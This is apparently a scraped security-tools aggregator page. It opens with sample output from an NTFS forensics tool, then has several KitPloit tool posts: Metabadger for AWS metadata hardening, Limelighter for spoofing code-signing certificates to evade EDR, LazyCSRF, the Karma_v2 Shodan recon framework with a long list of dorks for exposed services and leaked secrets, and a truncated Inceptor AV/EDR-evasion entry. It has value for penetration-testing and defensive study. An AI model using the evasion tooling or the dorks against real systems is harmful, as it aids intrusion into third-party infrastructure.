    LSN,ClientPreviousLSN,UndoNextLSN,ClientID,RecordType,TransactionID,RedoOperation,UndoOperation,MFTClusterIndex,TargetVCN,TargetLCN
5269000,5268967,5268967,0,1,24,SetNewAttributeSizes,SetNewAttributeSizes,2,10,43700
5269019,5269000,5269000,0,1,24,UpdateNonresidentValue,Noop,0,0,37594
5269044,5269019,5269019,0,1,24,SetNewAttributeSizes,SetNewAttributeSizes,2,10,43700
5269063,5269044,5269044,0,1,24,SetNewAttributeSizes,SetNewAttributeSizes,2,10,43700
5269082,5269063,5269063,0,1,24,UpdateNonresidentValue,Noop,0,0,37594
5269103,5269082,5269082,0,1,24,SetNewAttributeSizes,SetNewAttributeSizes,2,10,43700
5269122,5269103,0,0,1,24,ForgetTransaction,CompensationLogRecord,0,0,18446744073709551615
5269133,0,0,0,1,24,UpdateResidentValue,UpdateResidentValue,2,13,43703

usn
usn disk=4 volume=1 output=usn.csv format=csv
[+] Opening \\?\Volume{00000001-0000-0000-0000-000000000000}\
[+] Finding $Extend\$UsnJrnl record
[+] Found in file record : 41
[+] Data stream $J size : 2.66 KiBs
[+] Reading $J
[+] Processing entry : 32
[+] Closing volume
Sample of usn.csv
MajorVersion,MinorVersion,FileReferenceNumber,FileReferenceSequenceNumber,ParentFileReferenceNumber,ParentFileReferenceSequenceNumber,Usn,Timestamp,Reason,SourceInfo,SecurityId,FileAttributes,Filename
2,0,53,4,5,5,0,2020-02-26 21:43:36,FILE_CREATE,0,0,DIRECTORY,Nouveau dossier
2,0,53,4,5,5,96,2020-02-26 21:43:36,FILE_CREATE+CLOSE,0,0,DIRECTORY,Nouveau dossier
2,0,53,4,5,5,192,2020-02-26 21:43:38,RENAME_OLD_NAME,0,0,DIRECTORY,Nouveau dossier
2,0,53,4,5,5,288,2020-02-26 21:43:38,RENAME_NEW_NAME,0,0,DIRECTORY,test
2,0,53,4,5,5,360,2020-02-26 21:43:38,RENAME_NEW_NAME+CLOSE,0,0,DIRECTORY,test
2,0,53,4,5,5,432,2020-02-26 21:43:39,OBJECT_ID_CHANGE,0,0,DIRECTORY,test
2,0,53,4,5,5,504,2020-02-26 21:43:39,OBJECT_ID_CHANGE+CLOSE,0,0,DIRECTORY,test
2,0,54,2,53,4,576,2020-02-26 21:43:41,FILE_CREATE,0,0,ARCHIVE,Nouveau document texte.txt

shadow
shadow disk=0 volume=4
[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[+] VSS header found at 0x1e00

+---------------------------------------------------------------------------------------------------------------+
| SetID/ID | Count | Date | Details |
+---------------------------------------------------------------------------------------------------------------+
| {857c9ac4-ee4f-4bc6-b822-59e935a7120f} | 1 | 2020-09-21 00:15:38 | Service Machine : WORK-PC10 |
| | | | Originating Machine: WORK-PC10 |
| {3d102db1-8de2-4e7d-8ba5-e0dd4f67740d} | | | State : Created |
| | | | Flags : 0x0042000d |
| | | | - Persistent |
| | | | - Client Accessible |
| | | | - No Auto Release |
| | | | - Differential |
| | | | - Auto Recover |
+---------------------------------------------------------------------------------------------------------------+
| {83bc8af4-8802-4466-ae38-717f6474616a} | 1 | 2020-09-22 06:10:00 | Service Machine : WORK-PC10 |
| | | | Originating Machine: WORK-PC10 |
| {e668c329-66a2-4ebd-beef-3c6bca81cbf7} | | | State : Created |
| | | | Flags : 0x0042000d |
| | | | - Persistent |
| | | | - Client Accessible |
| | | | - No Auto Release |
| | | | - Differential |
| | | | - Auto Recover |
+---------------------------------------------------------------------------------------------------------------+

streams
streams disk=0 volume=4 from=c:\test.pdf
Listing streams from \\.\PhysicalDrive0 > Volume:4
--------------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[-] Source : c:\test.pdf
[-] Record Num : 13525 (000034d5h)
[+] Alternate data stream(s):
+-----------------------------+
| Id | Name | Size |
+-----------------------------+
| 0 | Zone.Identifier | 27 |
+-----------------------------+

undelete
undelete disk=4 volume=1
[+] Opening \\?\Volume{00000001-0000-0000-0000-000000000000}\
[+] Reading $MFT record
[+] $MFT size : 256.00 KiBs (~256 records)
[+] Reading $BITMAP record
[+] $BITMAP size : 16.00 KiBs
[+] Searching deleted files
[+] Processed data size : 262144 (100%)
[+] Duration : 7ms

Deleted Files Found
-------------------

+---------------------------------------------------------------------------------------------------------------+
| Id | MFT Index | Flag | Filename | Size | Deletion Date | % Recoverable |
+---------------------------------------------------------------------------------------------------------------+
| 0 | 00000029 | | .\$RECYCLE.BIN\[...]\$RAV85W4.jpg | 5.10 KiBs | 2020-02-26 21:29:03 | 100.00 |
+---------------------------------------------------------------------------------------------------------------+
| 1 | 00000035 | | .\$RECYCLE.BIN\[...]\$IAV85W4.jpg | 58.00 bytes | 2020-02-26 21:29:03 | 100.00 |
+---------------------------------------------------------------------------------------------------------------+
undelete disk=4 volume=1 inode=41 output=restored_kitten.jpg
[+] Opening \\?\Volume{00000001-0000-0000-0000-000000000000}\
[+] Reading file record : 41
[+] Extracting $RAV85W4.jpg to restored_kitten.jpg
[+] 5219 bytes written

shell
shell disk=4 volume=1
disk4:volume1:> ls

Inode | Type | Name | Size | Creation Date | Attributes
---------------------------------------------------------------------------------------
4 | | $AttrDef | 2560 | 2020-02-26 16:35:29 | Hi Sy
8 | | $BadClus | 0 | 2020-02-26 16:35:29 | Hi Sy
| ADS | $Bad | 536866816 | |
6 | | $Bitmap | 16384 | 2020-02-26 16:35:29 | Hi Sy
7 | | $Boot | 8192 | 2020-02-26 16:35:29 | Hi Sy
11 | DIR | $Extend | | 2020-02-26 16:35:29 | Hi Sy
2 | | $LogFile | 4341760 | 2020-02-26 16:35:29 | Hi Sy
0 | | $MFT | 262144 | 2020-02-26 16:35:29 | Hi Sy
1 | | $MFTMirr | 4096 | 2020-02-26 16:35:29 | Hi Sy
50 | DIR | $RECYCLE.BIN | | 2020-02-26 16:40:34 | Hi Sy
9 | | $Secure | 0 | 2020-02-26 16:35:29 | Hi Sy
| ADS | $SDS | 264200 | |
10 | | $UpCase | 131072 | 2020-02-26 16:35:29 | Hi Sy
| ADS | $Info | 32 | |
3 | | $Volume | 0 | 2020-02-26 16:35:29 | Hi Sy
5 | DIR | . | | 2020-02-26 16:35:29 | Hi Sy
85010 | | 7z1900-x64.exe | 1447178 | 2020-07-29 17:19:49 | Ar
| ADS | Zone.Identifier | 123 | |
42 | | hello.txt | 5 | 2020-02-26 21:27:33 | Ar
39 | | kitten1.jpg | 23486 | 2020-02-26 16:37:23 | Ar
| ADS | Zone.Identifier | 154 | |
40 | | kitten2.jpg | 79678 | 2020-02-26 16:37:55 | Ar
| ADS | Zone.Identifier | 303 | |
41 | | kitten3.jpg | 5219 | 2020-02-26 16:38:16 | Ar
| ADS | Zone.Identifier | 262 | |
36 | DIR | System Volume Information | | 2020-02-26 16:35:29 | Hi Sy

disk4:volume1:> pwd
\
disk4:volume1:> cat hello.txt
Hey !
disk4:volume1:> cat 7z1900-x64.exe:Zone.Identifier
[ZoneTransfer]
ZoneId=3
ReferrerUrl=https://www.7-zip.org/download.html
HostUrl=https://www.7-zip.org/a/7z1900-x64.exe

disk4:volume1:> exit

smart
smart disk=1
Version          : 1 revision 1
Type : SATA/IDE Master on primary channel
Capabilities : ATA, ATAPI, S.M.A.R.T

Status : Passed

-- Device ID
+---------------------------------------------------------------------------------------------------+
| Property | Value |
+---------------------------------------------------------------------------------------------------+
| General Configuration | 0040h |
| Number of Cylinders | 16383 |
| Reserved | c837h |
| Number Of Heads | 16 |
| Bytes Per Track | 0 |
| Bytes Per Sector | 0 |
| Sectors Per Track | 63 |
| Vendor Unique | |
| Seria Number | S2RBNX0H606448W |
| Buffer Type | 0 |
| Buffer Size | 0 |
| ECC Size | 0 |
| Firmware Revision | EMT02B6Q |
| Model Number | Samsung SSD 850 EVO 500GB |
| Maximum Number of Sectors On R/W | 32769 |
| Double Word IO | 16385 |
| Capabilities | Reserved : 0000h |
| | DMA Support : True |
| | LBA Support : True |
| | DisIORDY : True |
| | IORDY : True |
| | Requires ATA soft start : False |
| | Overlap Operation support: True |
| | Command Queue Support : False |
| | Interleaved DMA Support : False |
| Reserved1 | 4000h |
| PIO Timing | 512 |
| DMA Timing | 512 |
| Field Validity | CHS Number : True |
| | Cycle Number : True |
| | Ultra DMA : True |
| Current numbers of cylinders | 16383 |
| Current numbers of heads | 16 |
| Current numbers of sectors per track | 63 |
| Multiple Sector Setting | 16514064 |
| Total Number of Sectors Addressable (LBA) | 268435455 |
| Singleword DMA Transfer Support | 0 |
| Multiword DMA Transfer Support | Mode 0 (4.17Mb/s) |
| | Mode 1 (13.3Mb/s) |
| | Mode 2 (16.7Mb/s) |
| Advanced PIO Modes | 0003h |
| Minimum Multiword DMA Transfer Cycle Time per Word | 120 |
| Recommended Multiword DMA Transfer Cycle Time per Word | 120 |
| Minimum PIO Transfer Cycle Time (No Flow Control) | 120 |
| Minimum PIO Transfer Cycle Time (Flow Control) | 120 |
| ATA Support | ATA-2 |
| | ATA-3 |
| | ATA-4 |
| | ATA/ATAPI-5 |
| | ATA/ATAPI-6 |
| | ATA/ATAPI-7 |
| | ATA/ATAPI-8 |
| | ATA/ATAPI-9 |
| Ultra DMA Transfer Support | Mode 0 (16.7MB/s) |
| | Mode 1 (25.0MB/s) |
| | Mode 2 (33.3MB/s) |
| | Mode 3 (44.4MB/s) |
| | Mode 4 (66.7MB/s) |
| | Mode 5 (100.0MB/s) (selected) |
| | Mode 6 (133.0MB/s) |
+---------------------------------------------------------------------------------------------------+

-- Attributes
+-------------------------------------------------------------------------------------------------------------------+
| Index | Name | Flags | Raw | Value | Worst | Threshold | Status |
+-------------------------------------------------------------------------------------------------------------------+
| 05h | Reallocated Sector Count | 0033h | 000000000000h | 100 | 100 | 10 | Ok |
| 09h | Power-On Hours Count | 0032h | 000000008d54h | 92 | 92 | 0 | Ok |
| 0ch | Power Cycle Count | 0032h | 0000000000f5h | 99 | 99 | 0 | Ok |
| b1h | Wear Range Delta | 0013h | 00000000005eh | 95 | 95 | 0 | Ok |
| b3h | Used Reserved Block Count (Total) | 0013h | 000000000000h | 100 | 100 | 10 | Ok |
| b5h | Program Fail Count Total | 0032h | 000000000000h | 100 | 100 | 10 | Ok |
| b6h | Erase Fail Count | 0032h | 000000000000h | 100 | 100 | 10 | Ok |
| b7h | Sata Down Shift Error Count | 0013h | 000000000000h | 100 | 100 | 10 | Ok |
| bbh | Reported Uncorrectable Errors | 0032h | 000000000000h | 100 | 100 | 0 | Ok |
| beh | Temperature Difference From 100 | 0032h | 000000000020h | 68 | 50 | 0 | Ok |
| c3h | Hardware Ecc Recovered | 001ah | 000000000000h | 200 | 200 | 0 | Ok |
| c7h | Udma Crc Error Rate | 003eh | 000000000000h | 100 | 100 | 0 | Ok |
| ebh | Good Block Count And System Free Block Count | 0012h | 000000000071h | 99 | 99 | 0 | Ok |
| f1h | Lifetime Writes From Host Gib | 0032h | 00154bf298c9h | 99 | 99 | 0 | Ok |
+-------------------------------------------------------------------------------------------------------------------+


βœ‡ KitPloit - PenTest & Hacking Tools

Metabadger - Prevent SSRF Attacks On AWS EC2 Via Automated Upgrades To The More Secure Instance Metadata Service V2 (IMDSv2)

By: Zion3R β€”


Prevent SSRF attacks on AWS EC2 via automated upgrades to the more secure Instance Metadata Service v2 (IMDSv2).


Metabadger

Purpose and functionality

  • Diagnose and evaluate your current usage of the AWS Instance Metadata Service along with understanding how the service works
  • Prepare you to upgrade to v2 of the Instance Metadata service to safeguard against v1 attack vectors
  • Give you the ability to specifically update your instances to only use IMDSv2
  • Give you the ability to disable the Instance Metadata service where you do not need it as a way to reduce attack surface

What is the AWS Instance Metadata Service?
  • The AWS metadata service essentially gives you access to all the things within an instance, including the instance role credential & session token
  • Known SSRF vulnerabilities that exploit and use this attack as a pivot into your environment
  • The famous attacks you have heard about, some of which involved this method of gaining access via a vulnerable web app with access to the instance metadata service
  • Attacker could take said credentials from metadata service and use them outside of that particular instance

IMDSv2 and why it should be used
  • Ensuring that instances are using V2 of the metadata service at all times by making it a requirement within it’s configuration
  • Enabling session tokens with a PUT request with a mandatory request header to the AWS metadata API, IMDSv1 does not check for this making it easier for attackers to exploit the service
  • X-Forwarded-For header is not allowed in IMDSv2 ensuring that no proxy based traffic is allowed to communicate with the metadata service

Problem Statement

Engineering teams may have a vast variety of compute infrastructure in AWS that they need to protect from certain vulnerabilities that leverage the metadata service. The metadata service is required to run on instances if any IAM is used or if there is any user data information the instance might need when it boots. Limiting the attack surface of your instances is crucial in preventing the ability to pivot in your environment by stealing information provided by the service itself. Numerous famous attacks in the past have leveraged this particular service to exploit a role that is attached to the instance or dump sensitive data that is accessible via the metadata service. Metabadger can help to identify where and how you are using the instance metadata service while also giving you the ability to reduce any unwanted attack leverage to lower your overall risk posture while operating in EC2.


Disclaimer and Rollback

Using this tool may impact your AWS compute infrastructure as not all services and applications may work either without the metadata service or on version 2. Take caution when deploying this in your production environment and have a rollback plan in place incase something seems out of the ordinary. Metabadger comes built in with the ability to roll back to the default version 1 of the service using the -v1 flag, you can use this to quickly roll back your instances to use the default. Ideally, you should run this tool and update your metadata version in non-production environments as a proving grounds before applying it.


Guided Steps for Hardening

Step 1

Initially, we want to discover our overall usage of the metadata service in a particular AWS region. Metabadger will evaluate the current status of your usage in the region where your credentials point to in your /.aws/credentials file or the current role that is assumed. You may also specify the --region flag when running the discover-metadata command if you would like to change to another region than what is currently configured. Once you have a good idea of which version your instances are running and if the service is enabled or disabled, you will be able to make a much more defined action plan for hardening the service. Note that you can find specific meaning to every metadata option that is set here.

Step 2

One of the areas that should be evaluated when making the switch to v2 of the service is the use of IAM roles. Metabadger lets you identify instances in a region that may already be using an IAM role. The discover-role-usage command will output a list of instances that have roles attached to them. If you have a lot of instances using roles, you should take precaution when updating the service to v2 to ensure the overall functionality of your workloads does not become impacted.

Step 3

Upon completion of doing your initial discovery and evaluation, you can now create a staged approach to hardening your compute infrastructure to use either v2 of the metadata service or disable it where it may not be used. The harden-metadata command allows you to update all instances in a particular region by default. You can also pass instance tags using the --tags flag or an input file containing a csv of instances that you would like to apply a configuration for. Once you have made the appropriate updates to v2 and disabled the service where it is not used you can re-evaluate using the items in Step 1 to confirm your environment is locked down. If you have certain instances that you don't want to update you can exlude them via the --exclusion flag by tag or instance id.


Requirements

Metabadger requires an IAM role or credentials with the following permission:

ec2:ModifyInstanceAttribute
ec2:DescribeInstances

When making changes to the Instance Metadata service, you should be cautious and follow additional guidance from AWS on how to safely upgrade to version 2. Metabadger was designed to assist you with this process to further secure your compute infrastructure in AWS.

AWS Best Practice Guide on Updating to IMDSv2


Usage & Installation

Install via pip

pip3 install --user metabadger

Install via Github

$ git clone https://github.com/salesforce/metabadger
$ cd metabadger
$ pip install -e .

$ metabadger
Usage: metabadger [OPTIONS] COMMAND [ARGS]...

Metabadger is an AWS Security Tool used for discovering and hardening the
Instance Metadata service.

Options:
--version Show the version and exit.
--help Show this message and exit.

Commands:
disable-metadata Disable the IMDS service on EC2 instances
discover-metadata Discover summary of IMDS service usage within EC2
discover-role-usage Discover summary of IAM role usage for EC2
harden-metadata Harden the AWS instance metadata service from v1 to v2

Commands

discover-metadata

A summary of your overall instance metadata service usage including which version and an overall enforcement percentage. Using these numbers will help you understand the overall posture of how hardened your metadata usage is and where you're enforcing v2 vs v1.

Options:
-a, --all-region Provide a metadata summary for all available regions in the AWS account
-j, --json Get metadata summary in JSON format
-r, --region TEXT Specify which AWS region you will perform this command in
-p, --profile TEXT Specify the AWS IAM profile.

discover-role-usage

A summary of instances and the roles that they are using, this will give you a good idea of the caution you must take when making updates to the metadata service itself.

Options:
-p, --profile TEXT Specify the AWS IAM profile.
-r, --region TEXT Specify which AWS region you will perform this command in

harden-metadata

The ability to modify the instances to use either metadata v1 or v2 and to get an understanding of how many instances would be modified by running a dry run mode.

Options:
-e, --exclusion The exclusion flag will apply to everything besides what is specified, tags or instances
-d, --dry-run Dry run of hardening metadata changes
-v1, --v1 Enforces v1 of the metadata service
-i, --input-file PATH Path of csv file of instances to harden IMDS for
-t, --tags TEXT A comma seperated list of tags to apply the hardening setting to
-r, --region TEXT Specify which AWS region you will perform this command in
-p, --profile TEXT Specify the AWS IAM profile.

disable-metadata

Use this command to completely disable the metadata servie on instances.

Options:
-e, --exclusion The exclusion flag will apply to everything besides what is specified, tags or instances
-d, --dry-run Dry run of disabling the metadata service
-i, --input-file PATH Path of csv file of instances to disable IMDS for
-t, --tags TEXT A comma seperated list of tags to apply the hardening setting to
-r, --region TEXT Specify which AWS region you will perform this command in
-p, --profile TEXT Specify the AWS IAM profile.

Logging

All changes made by Metabadger will be logged to a file saved in the working directory called metabadger.log. The file will include the following for every action that the tool takes when it changes the metadata service:

  • The time and date stamp for when a change was made
  • Change that occured (disabled, hardened, or updated)
  • The instance ID where the change was made
  • Dry run information
  • A status on if the change was successful or not


βœ‡ KitPloit - PenTest & Hacking Tools

Limelighter - A Tool For Generating Fake Code Signing Certificates Or Signing Real Ones

By: Zion3R β€”


A tool which creates a spoof code signing certificates and sign binaries and DLL files to help evade EDR products and avoid MSS and sock scruitney. LimeLighter can also use valid code signing certificates to sign files. Limelighter can use a fully qualified domain name such as acme.com.


Contributing

LimeLighter was developed in golang.

Make sure that the following are installed on your OS

openssl
osslsigncode

The first step as always is to clone the repo. Before you compile LimeLighter you'll need to install the dependencies. To install them, run following commands:

go get github.com/fatih/color

Then build it

go build Limelighter.go

Usage
./LimeLighter -h       

.____ .__ .____ .__ .__ __
| | |__| _____ ____ | | |__| ____ | |___/ |_ ___________
| | | |/ \_/ __ \| | | |/ ___\| | \ __\/ __ \_ __ \
| |___| | Y Y \ ___/| |___| / /_/ > Y \ | \ ___/| | \/
|_______ \__|__|_| /\___ >_______ \__\___ /|___| /__| \___ >__|
\/ \/ \/ \/ /_____/ \/ \/
@Tyl0us


[*] A Tool for Code Signing... Real and fake
Usage of ./LimeLighter:
-Domain string
Domain you want to create a fake code sign for
-I string
Unsiged file name to be signed
-O string
Signed file name
-Password string
Password for real certificate
-Real string
Path to a valid .pfx certificate file
-Verify string
Verifies a file's code sign certificate
-debug
Print debug statements

To sign a file you can use the command option Domain to generate a fake code signing certificate.


Β 

to sign a file with a valid code signing certificate use the Real and Password to sign a file with a valid code signing certificate.

To verify a signed file use the verify command.





βœ‡ KitPloit - PenTest & Hacking Tools

LazyCSRF - A More Useful CSRF PoC Generator

By: Zion3R β€”


LazyCSRF is a more useful CSRF PoC generator that runs on Burp Suite.


Motivation

Burp Suite is an intercepting HTTP Proxy, and it is the defacto tool for performing web application security testing. The feature of Burp Suite that I like the most is Generate CSRF PoC. However, this does not support JSON parameters. It also uses the <form>, so it cannot send PUT/DELETE requests. In addition, multibyte characters that can be displayed in the burp itself are often garbled in the generated CSRF PoC. Those were the motivations for creating this extension.


Features
  • Generating CSRF PoC with Burp Suite Community Edition (of course, it also works in Professional Edition)
  • Support JSON parameter (like GraphQL Request)
  • Support PUT/DELETE (only work with CORS enabled with an unrestrictive policy)
  • Support displaying multibyte characters (like Japanese)

Difference in display of multibyte characters

The following image shows the difference in the display of multibyte characters between Burp's CSRF PoC generator and LazyCSRF. LazyCSRF can generate CSRF PoC without garbling multibyte characters that are not garbled on Burp.


Β 

Installation

Download the jar from GitHub Releases. In Burp Suite, go to the Extensions tab in the Extender tab, and add a new extension. Select the extension type Java, and specify the location of the jar.


How to Build

intellij

If you use IntelliJ IDEA, you can build it by following Build -> Build Artifacts -> LazyCSRF:jar -> Build.


Command line

You can build it with maven.

$ mvn install

Usage

You can generate a CSRF PoC by selecting Extensions->Generate JSON CSRF PoC with Ajax or Generate POST PoC with Form from the menu that opens by right-clicking on Burp Suite.



LICENSE

MIT License

Copyright (C) 2021 tkmru



βœ‡ KitPloit - PenTest & Hacking Tools

Karma_V2 - A Passive Open Source Intelligence (OSINT) Automated Reconnaissance (Framework)

By: Zion3R β€”

πš”πšŠπš›πš–πšŠ 𝚟𝟸 is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework)


πš”πšŠπš›πš–πšŠ 𝚟𝟸 can be used by Infosec Researchers, Penetration Testers, Bug Hunters to find deep information, more assets, WAF/CDN bypassed IPs, Internal/External Infra, Publicly exposed leaks and many more about their target. Shodan Premium API key is required to use this automation. Output from the πš”πšŠπš›πš–πšŠ 𝚟𝟸 is displayed to the screen and saved to files/directories.

Regarding Premium Shodan API, Please see the Shodan site for more information.

Shodan website: Shodan WebsiteAPI : Developer API


Features
  • Powerful and flexible results via Shodan Dorks
  • SSL SHA1 checksum/fingerprint Search
  • Only hit In-Scope IPs
  • Verify each IP with SSL/TLS certificate issuer match RegEx
  • Provide Out-Of-Scope IPs
  • Find out all ports including well known/uncommon/dynamic
  • Grab all targets vulnerabilities related to CVEs
  • Banner grab for each IP, Product, OS, Services & Org etc.
  • Grab favicon Icons
  • Generate Favicon Hash using python3 mmh3 Module
  • Favicon Technology Detection using nuclei custom template
  • ASN Scan
  • BGP Neighbour
  • IPv4 & IPv6 Profixes for ASN
  • Interesting Leaks like Indexing, NDMP, SMB, Login, SignUp, OAuth, SSO, Status 401/403/500, VPN, Citrix, Jfrog, Dashboards, OpenFire, Control Panels, Wordpress, Laravel, Jetty, S3 Buckets, Cloudfront, Jenkins, Kubernetes, Node Exports, Grafana, RabbitMQ, Containers, GitLab, MongoDB, Elastic, FTP anonymous, Memcached, DNS Recursion, Kibana, Prometheus, Default Passwords, Protected Objects, Moodle, Spring Boot, Django, Jira, Ruby, Secret Key and many more...

Installation

1. Clone the repo
# git clone https://github.com/Dheerajmadhukar/karma_v2.git

2. Install shodan & mmh3 python module
# python3 -m pip install shodan mmh3

3. Install JSON Parser [JQ]
# apt install jq -y

4. Install httprobe @tomnomnom to probe the requests
# GO111MODULE=on go get -v github.com/tomnomnom/httprobe

5. Install Interlace @codingo to multithread [Follow the codingo interlace repo instructions]
# git clone https://github.com/codingo/Interlace.git & install accordingly. 

6. Install nuclei @projectdiscovery
# GO111MODULE=on go get -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei

7. Install lolcat
# apt install lolcat -y

8. Install anew
# GO111MODULE=on go get -u github.com/tomnomnom/anew

Ok, how do I use it?
# cat > .token
SHODAN_PREMIUM_API_HERE

Usage

You can use this command to check help:

$ bash karma_v2 -h



MODEs
MODE Examples
-ip bash karma_v2 -d <DOMAIN.TLD> -l <INTEGER> -ip
-asn bash karma_v2 -d <DOMAIN.TLD> -l <INTEGER> -asn
-cve bash karma_v2 -d <DOMAIN.TLD> -l <INTEGER> -cve
-favicon bash karma_v2 -d <DOMAIN.TLD> -l <INTEGER> -favicon
-leaks bash karma_v2 -d <DOMAIN.TLD> -l <INTEGER> -leaks
-deep bash karma_v2 -d <DOMAIN.TLD> -l <INTEGER> -deep
-count bash karma_v2 -d <DOMAIN.TLD> -l <INTEGER> -count

Demo
  • karma_v2 [mode -ip] &#10359;&#10242;&#120468;&#120458;&#120475;&#120470;&#120458; &#120479;&#120824;&#10256;&#10430; is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework) (8)
  • karma_v2 [mode -asn] &#10359;&#10242;&#120468;&#120458;&#120475;&#120470;&#120458; &#120479;&#120824;&#10256;&#10430; is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework) (9)
  • karma_v2 [mode -cve] &#10359;&#10242;&#120468;&#120458;&#120475;&#120470;&#120458; &#120479;&#120824;&#10256;&#10430; is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework) (10)
  • karma_v2 [mode -favicon] &#10359;&#10242;&#120468;&#120458;&#120475;&#120470;&#120458; &#120479;&#120824;&#10256;&#10430; is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework) (11)
  • karma_v2 [mode -leaks]

&#10359;&#10242;&#120468;&#120458;&#120475;&#120470;&#120458; &#120479;&#120824;&#10256;&#10430; is a Passive Open Source Intelligence (OSINT) Automated Reconnaissance (framework) (12)


  • karma_v2 [mode -deep]

-deep support all the above modes e.g. -count,-ip,-asn,-favicon,-cve,-leaks !


Output
output/bugcrowd.com-YYYY-MM-DD/ 

.
β”œβ”€β”€ ASNs_Detailed_bugcrowd.com.txt
β”œβ”€β”€ Collect
β”‚ β”œβ”€β”€ host_domain_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_12289a814...83029f8944b6088d60204a92e_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_17537bf84...73cb1d684a495db7ea5aa611b_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_198d6d4ec...681b77585190078b07b37c5e1_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_26a9c5618...d60eae2947b42263e154d203f_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_3da3825a2...3b852a42470410183adc3b9ee_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_4d0eab730...68cf11d2db94cc2454c906532_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_8907dab4c...12fdbdd6c445a4a8152f6b7b7_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_9a9b99eba...5dc5106cea745a591bf96b044_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_a7c14d201...b6fd4bc4e95ab2897e6a0bsfd_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_SHA1_a90f4ddb0...85780bdb06de83fefdc8a612d_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_domain_domain.tld.json.gz
β”‚ β”œβ”€β”€ ssl_subjectCN_domain.tld.json.gz
β”‚ └── ssl_subject_domain.tld.json.gz
| └── . . .
β”œβ”€β”€ IP_VULNS
β”‚ β”œβ”€β”€ 104.x.x.x.json.gz
β”‚ β”œβ”€β”€ 107.x.x.x.json.gz
β”‚ β”œβ”€β”€ 107.x.x.x.json.gz
β”‚ └── 99.x.x.x.json.gz
| └── . . .
β”œβ”€β”€ favicons_domain.tld.txt
β”œβ”€β”€ host_enum_domain.tld.txt
β”œβ”€β”€ ips_inscope_domain.tld.txt
β”œβ”€β”€ main_domain.tld.data
β”œβ”€β”€ . . .

karma_v2 Newly Added Shodan Dorks
  • SonarQube
  • Apache hadoop node
  • Directory Listing
  • Oracle Business intelligence
  • Oracle Web Login
  • Docker Exec
  • Apache Status
  • Apache-Coyote/1.1 Tomcat-5.5
  • Swagger UI
  • H-SPHERE
  • Splunk
  • JBoss
  • phpinfo
  • ID_VC
  • Confluence
  • TIBCO_Jaspersoft
  • Shipyard_Docker_management
  • Symfony PHP info AWS creds
  • Ignored-by_CDNs
  • Django_Exposed
  • Cluster_Node_etcd
  • SAP_NetWeaver_Application

πš”πšŠπš›πš–πšŠ 𝚟𝟸 Supported Shodan Dorks
DORKs DORKs DORKs
ssl.cert.fingerprint http.status:"302" oauth "Server: Jetty"
ssl http.status:"302" sso X-Amz-Bucket-Region
org title:"401 Authorization Required" "development" org:"Amazon.com"
hostname http.html:"403 Forbidden" "X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Jenkins [Jenkins]"
ssl.cert.issuer.cn http.html:"500 Internal Server Error" http.favicon.hash:81586312 200
ssl.cert.subject.cn ssl.cert.subject.cn:*vpn* product:"Kubernetes" port:"10250, 2379"
ssl.cert.expired:true title:"citrix gateway" port:"9100" http.title:"Node Exporter"
ssl.cert.subject.commonName http.html:"JFrog" http.title:"Grafana"
http.title:"Index of /" "X-Jfrog" http.title:"RabbitMQ"
ftp port:"10000" http.title:"dashboard" HTTP/1.1 307 Temporary Redirect "Location: /containers"
"Authentication: disabled" port:445 product:"Samba" http.title:"Openfire Admin Console" http.favicon.hash:1278323681
title:"Login - Adminer" http.title:"control panel" "MongoDB Server Information" port:27017 -authentication
http.title:"sign up" http.html:"* The wp-config.php creation script uses this file" port:"9200" all:"elastic indices"
http.title:"LogIn" clockwork "220" "230 Login successful." port:21
port:"11211" product:"Memcached" "port: 53" Recursion: Enabled title:"kibana"
port:9090 http.title:"Prometheus Time Series Collection and Processing Server" "default password" title:protected
http.component:Moodle http.favicon.hash:116323821 html:"/login/?next=" title:"Django"
html:"/admin/login/?next=" title:"Django" title:"system dashboard" html:jira http.component:ruby port:3000
html:"secret_key_base" I will add more soon . . .

πš”πšŠπš›πš–πšŠ 𝚟𝟸 Newly Added Shodan Dorks
DORKs DORKs DORKs
"netweaver" port:"2379" product:"etcd" http.title:"DisallowedHost"
ssl:"${target}" "-AkamaiGHost" "-GHost" ssl:"${target}" "-Cloudflare" ssl:"${target}" "-Cloudfront"
"X-Debug-Token-Link" port:443 http.title:"shipyard" HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 5664 http.title:"TIBCO Jaspersoft:" port:"443" "1970"
"Confluence" http.title:"SonarQube" html:"jmx?qry=Hadoop:*"
http.title:"Directory Listing" http.title:"H-SPHERE" http.title:"Swagger UI - "
Server: Apache-Coyote/1.1 Tomcat-5.5" port:2375 product:"Docker" http.title:"phpinfo()"
http.title:"ID_VC_Welcome" "x-powered-by" "jboss" jboss http.favicon.hash:-656811182
http.title:"Welcome to JBoss" port:"8089, 8000" "splunkd" http.favicon.hash:-316785925
title:"splunkd" org:"Amazon.com" http.title:"oracle business intelligence sign in" http.title:"Oracle WebLogic Server Administration Console"
http.title:"Apache Status" I will add more soon . . .



βœ‡ KitPloit - PenTest & Hacking Tools

Inceptor - Template-Driven AV/EDR Evasion Framework

By: Zion3R β€”


Modern Penetration testing and Red Teaming often requires to bypass common AV/EDR appliances in order to execute code on a target. With time, defenses are becoming more complex and inherently more difficult to bypass consistently.

Inceptor is a tool which can help to automate great part of this process, hopefully requiring no further effort.


Features

